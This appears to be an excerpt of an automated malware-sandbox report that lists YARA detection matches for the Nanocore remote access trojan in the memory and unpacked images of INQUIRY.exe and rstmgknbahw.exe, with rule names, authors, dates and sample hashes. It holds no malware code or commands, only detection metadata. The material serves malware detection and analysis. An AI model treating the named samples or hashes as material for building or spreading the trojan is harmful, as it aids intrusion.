Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: INQUIRY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
